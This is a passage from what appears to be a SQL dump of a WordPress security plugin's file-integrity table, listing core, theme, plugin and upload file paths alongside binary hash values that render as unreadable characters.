���','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���+(7�D��',')�vIy��a��\"?����@v�pYAqJ���>�','',0,'?'),('��-�w��=����S','wp-includes/css/dist/edit-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\"3B+�|��^��<�K','�B���.��C��A�{�����C#f�-��','',0,'?'),('�8�����g����','wp-content/themes/vega/assets/js/jquery.matchHeight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dp��P���h���k>','������Gr/ݵW]#YgV�\Z�\naL���k�','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5����A�Pg�}H','tܙ&>͎X�u���B�2RIe�@yJQ\Z&','',0,'?'),('�\'�Q,[^�}���+�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����T�j��)ʮ','��;���=J��ϗ[U�^��HYC�W�dD�','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�0Ŷl���bW��V','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/MessageInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0X�m�� �`����X','`�IK%ģ|�%��e����<6�%n�0ȯw%','',0,'?'),('�?7�`��9���Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��If�D�S~�Ee;\"','-�L\\Z�%���Er_^nniW�B-�mC���5A','',0,'?'),('�L���u���û����','wp-content/uploads/2016/11/retro-3249927_960_720-300x200.jpg',0,'|\'�.ʗ5�w���c','|\'�.ʗ5�w���c','&�^��9�ib�4�u��{��\n`��Q*!','',0,'?'),('�XL�t����Cc-��','wp-includes/blocks/query/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=����{#�����','?��� �?`0��i1�pL<�h�x��������','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�s�t��dkM�w�UO8','wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ayH���l/�3YSV�','+��\Z�3P���G��Z�ω���� a�X�','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%D٭���&x�l3�','h�o5uߟ�?Zg�����y��*��*`z','',0,'?'),('�U����2\'���-��','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gOP҇�č�����','���~8 ir���\nPp��\n2�5�DahBzP','',0,'?'),('��`b�ϰ����','wp-content/uploads/2019/08/roof-300x200.jpg',0,'�I�F�]è�kSz��Ӑ','�I�F�]è�kSz��Ӑ','խ�F�,�UQ \Z�O�/]G��wM�,P����','',0,'?'),('�>�]*a��R��','wp-content/plugins/wordpress-seo/src/helpers/product-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\0؇��I\'\\��\r�M','T*�����؝n���H3�{�~��&��\0�6','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('�ݒ{_B\'��fM�MV9','wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-300x250.jpg',0,'��#L{ƺW��\\���','��#L{ƺW��\\���','3s��ؐ��P�t��a���M�O+,��*','',0,'?'),('����{?����ZM','wp-content/uploads/2016/11/lost-places-updraft-pre-smush-original.jpg',0,'�6K�/�}1��̘,k','�6K�/�}1��̘,k','98a]Ț�S�����Q���)0�\0�hg����','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_x��a���tk2','�=v�3��U�A��ߠI��� 0d�','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�?�p_L��wE�,�','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/EnvPlaceholderParameterBag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o3+P��[�9,�','G��\r�Np3���x���x�w�\"QH�\'V� � ','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MR�t�\ZL?�B[Y','�0��kkay��P�{?l2~b���t�a�ҋ','',0,'?'),('�T�T�9ܰ��\nj�~','wp-includes/blocks/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�9�.*�?�\r��','N\rC�+�*`~\\{38��pnq��ޠ�\r7ݙ_�','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��u�\"<Z��\\�','VKl��-]����KC��R:�\"��칾G`jI�','',0,'?'),('�b��VE��7f�� ','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NI\0�/i���~��','�����\\&��r-������J������͠#','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F�6W�n����L','+~�5L�|�VfƁȻ����D���(%��z','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����j64�r�E�','7���H��B�ߍ�o|�$��:�KZ��i������','',0,'?'),('��Ҹ�j�VM&>[Е','wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��Xu��4̚��','�|��?�*�b:�(��n�lgp6��ڸ%','',0,'?'),('ᅂϖ%9����\0��D','wp-content/plugins/redirection/images/donate.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yyv:i�\n�����Cb','�y�<9�\n�v�QZB\\~Xt;���~#2x� Օ','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���Dq�\Zl܋]�','���%SC���xzg�Y3����$����)\'��\"','',0,'?'),('��a0P@�a\\x��-','wp-includes/blocks/social-link/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2t��L�\\^��\"�CV','pp&5kBo�b�N�M\nS,��Ա�^C����','',0,'?'),('�,N\ZȪbj_�6u�','wp-content/uploads/2016/11/roofs-250x141.jpg',0,'u:�\\j�]{�i0&G���','u:�\\j�]{�i0&G���','��yS�_�T�(;I��J�G�S��ucD/�i�.','',0,'?'),('�>���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f�� ˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Γ��jN�y��8','U��AM�V\n��PWk�xu� � �����/�=','',0,'?'),('�ͫ�]��D́i�','wp-includes/blocks/heading/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�F����`����\\#O','jC,�U�Ma��\\kdD��wi�ۭ�','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��JT{rZ��&>�','wp-content/uploads/2019/02/household-rubbish-updraft-pre-smush-original.jpg',0,'h���?o~4��z�1 �','h���?o~4��z�1 �','���nnĹ�5i�>����}��֏⎟�W�)','',0,'?'),('��q��:s���#10]-','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/MockHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�w&��K?@PY','\'�\rN�x\0H`�p�H$�`������43?j�[','',0,'?'),('��:�L`��= ����','wp-content/themes/vega/sample/images/full-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rAsR����;4���',',C��Ų�gawY�wF\r��R\'QN�!��>B\"�','',0,'?'),('�ߋ�����N���҅','wp-content/plugins/wordpress-seo/languages/wordpress-seo-bs_BA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����A�{Ælz��','�4DM9&X���]�N��.Yb�iṭB��H��','',0,'?'),('��\"�C*�����.��','wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e�4�6�g�p�o~�','',0,'?'),('�8�\n�����o��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ж�� �ef �%a� j�','��^�5*�+R��\Z�7S$�|+�c�����v','',0,'?'),('�C��t��,�:�','wp-content/plugins/wordpress-seo/src/repositories/seo-meta-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��je��V_?��ߟ�','���^�h:3�R����ػ�4е@���c��','',0,'?'),('�ޟC�E�O}\rՍ�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/StreamDecoratorTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�k�g�^�\0˰� ','��e3�:3���pm���EUv7�Cf!�1��','',0,'?'),('���lb6���\\=','wp-content/plugins/wordfence/css/wf-adminbar.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('�7.�8T��)��w��^','wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zi�Q �4��_�','|.�=���Z��>��*d�}W�r[{,9_�','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R �V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��fki�p�ǖk1�','��ll%G���dBAԺ�Ԧ$˛����55AA','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h2� �d�Gn)�_T`','�v�<�aRj4.�\"f{WL^Gx��3��]\'�','',0,'?'),('�{K~�ղ���Ų��ۨ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k&���}�;1','�.v;�q��]�m�,�\\ؔ���Zr�.�\n{','',0,'?'),('�y�`p��ƌ���','wp-content/plugins/wordpress-seo/languages/yoast-components-es_CR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�LLM�7� ���z�','��� ��32�/�-�<I8�f&ٕ)�.V�;��| ','',0,'?'),('��:�6d�e\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӟ=:&��$.���W`vI','�u����y�Һ\0v�&�%�0)^�\ZA�6�','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U�� �L]-�Rs�@�','ֲP4]���! o3\n��l���Q�0�','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4v��[��r�(�','2̇�!UJ�;�D<s�˕G�V��-�x��)�','',0,'?'),('�옉\r����n� ��','wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�!�������_���','��.�O!���{o�MG��w;���t�ᭉ�','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ns(�y��\Z�l#�$','&���Q/�HT]���Պ�p�}��|e�ZVq9','',0,'?'),('��$d�ЦW���H\'�','wp-content/plugins/disable-gutenberg/inc/settings-display.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jt\n��(�\r�+\\','���/���m.D�{�n�+�M.��V8�#�Ѿ�W','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u; \0�&','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x����_x1V','������A+�&\r�rgDu\"i#TZ��,ߑ���','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���j�ֺ�~�9&�','U? ��y�d��u�{m 5�3��>�՛�\n�\n�','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG �!]E��9','',0,'?'),('�S��\"BcB�-�y�','wp-content/plugins/wordpress-seo/src/commands/command-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�y���X�@s$Xos�','y�dT!�&R\\�p�^��OS\"N��u�S����','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-�� 0&������yl�','',0,'?'),('�c�oe�RP�]zL~','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-choice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���XwbCg��qjQ�','��I�?j+_�-�W`�Sl�)�w���hm7��','',0,'?'),('�l�:f2��|<\"�','wp-content/plugins/wordpress-seo/languages/yoast-components-uk.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�@R,�UKS{��}','�M_��HK��$:_f̠��NJ�\01�D�G��}','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(t����\r4��cR','�^�V�x���_:��k ��(��?�B�!','',0,'?'),('�r�뮎�e;�L�&','wp-content/uploads/2019/12/pexels-photo-164005.jpeg',0,'9�j�TAD�F���56�','9�j�TAD�F���56�','p���\nL�-���\nX\0��Kh�k��&�s','',0,'?'),('�tM�&�x�V�����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�142�%��F��)�','هO�x�,�{e>�z�Ɂ���s����2C��ܳ','',0,'?'),('��\Z�j��Ix���i','wp-content/uploads/2019/08/thai-property.jpg',0,'����6\'{y���','����6\'{y���',';�7�?}�FӚ��r�A}(5�\"!���?\n�','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T���� ?W��E>}�u���+��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('�Rs{p~���gЁؑ�','wp-includes/css/dist/reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�J_Z�w�;���','�R�=�WA)ш���`S{.�)�u�MM�F{�','',0,'?'),('���)�ى*��� �h','wp-content/plugins/wordpress-seo/js/dist/block-editor-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�q���������','����T��8\r�q���B�ku�j�u��-D[�~b','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('��1;�k}Fz�).��','wp-content/uploads/2019/09/tree-surgeon-300x250.jpg',0,'��o�7X]Q�7�0\0','��o�7X]Q�7�0\0','�m25ܣq�\0�L���Rs�4�v{P9��ܽ#�D�','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('�8�?p�C�|T�Z��','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/ResourceOwnerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:Z���(y�H��17','�X��k����f��l���C~}�ֶ��','',0,'?'),('��`c�@3���vz�','wp-includes/blocks/legacy-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��m\ZBh�\r$���+','{�C�&�Z���Z<H;UduYXr ��%;,�','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y�� �]�2','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�\n�G�� Yb:�','�����5��ύ���`��ʮ�z��&�}U����','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V%M_�g','��=x�ޓ�[����H��Y��DW�t�r<','',0,'?'),('�)�dX�:��h:}k','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*��y��&9{�1v��',':��9�@�U�x��.�kk��X�W�/�3g(','',0,'?'),('�,��*iV�O1a�\n3�','wp-includes/blocks/post-featured-image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','펩���¨g��A��״','汻\0@R�S���g,�_\n���B.����B�','',0,'?'),('�\\/蝄W�n�-�\n� 9','wp-includes/blocks/image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>4�~_^IR=�*>�̂6','�θ\n*�\n�H����@;ͻM�h�Z�/��','',0,'?'),('�]�X5D�i�Ⱥ2w��}','wp-content/languages/plugins/wordpress-seo-en_GB-d13b8ee2ebfa0516cf0150a39f12b521.json',0,'0/�[9�)\" ��+(','0/�[9�)\" ��+(','D�?�b�M$48)��5l_�Ѿs�X�o��','',0,'?'),('�^ۛ�������F','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ani��}���:�k','��EP���B)�A\Z^��У�u4,�9:o���>','',0,'?'),('�y�bb�ߏu$#Ԗ','wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-analysis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KP���4�����','�naӱ��*gUq��y#���Ia���`*�;�','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�? z�n�V�_','',0,'?'),('�|�\Z���QzZߜ�','wp-content/plugins/wordpress-seo/js/dist/languages/es-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<\\[P� ��','N\"c��b<�7zw�^ ��,�k���5|','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�x��<ȃ|��+QW','��L�c�c��9�00p����$ӥ����','',0,'?'),('�x����4���qL�','wp-content/plugins/redirection/locale/redirection-en_GB.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�rK����[QM{�','�:FG�-� 5�\rj�}��F�8���� ��;�*','',0,'?'),('��,G��/�u��~e{�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/ArrayAccessorTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�\\?LbY���(�','<\'�S�y�9+o�n�� �!��\\�%o-c','',0,'?'),('���\\�8T�</�M\Z�(','wp-content/uploads/2019/05/automatic-gates-updraft-pre-smush-original.jpg',0,'I���g��3�������','I���g��3�������','��%jrtjG�7��I���^ ��]K�X�*,JW�Q','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','klQ,�bh\n�3��U�a','���3S�ю\r�L�G� �g&�/!/�]ݣ�','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 +Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q-�UO�R?��<(D��','�0�my�C��_�y�Z�3Z�\0�l P9�i�3i','',0,'?'),('�u�G���/���t','wp-content/uploads/2016/11/White-Modern-Kitchen-300x250.jpg',0,'h��D8H���Q�j�I�','h��D8H���Q�j�I�','��t�!�\\�~�ſc���g�_��F�fP<����Z','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�(C�\0V)�4�_�\"','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-pinterest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�7(\"��3\'�>��','���\r�Q���C��*���=R��nx��','',0,'?'),('�)�鷫��g̨R','wp-includes/blocks/loginout/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E��$Y?�\n<�','�d�\0�s�-VT��I��5;4�|]!��%��0-;','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��\'���o','',0,'?'),('�5&$5Q���5��N�','wp-includes/js/dist/edit-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y8:�g/���\'���','�La3C/,�4�}��]^����Fo�9�����\'','',0,'?'),('�:�\\nJ���E���!','wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4f���\'?��S�','JL�P�=�<c3+�a�O��E(г','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6��ʜ9�Y�jbI�$','������4k�:�dȧ�!\'�{ݸ�M����h','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�O[�y��=��#\n\ZN@','wp-content/plugins/wordpress-seo/languages/yoast-components-fa_IR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������儨���6','^fX\nk`|�-[��.s|�����\'�.WX����U','',0,'?'),('�R��q� v��z\rPU','wp-content/plugins/wordfence/languages/wordfence.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0%���=X�Ӽ/��',']�%�N�8��ܠ��럷��_�;��\rD�,e��','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�o���:oNp\'d�!','wp-content/plugins/wordpress-seo/src/helpers/string-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��K��[O[��ֹ�','�HAO;�9r�]������\n����YB�˞L�L�','',0,'?'),('�se���Qr^T�K�','wp-includes/blocks/post-title/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��� 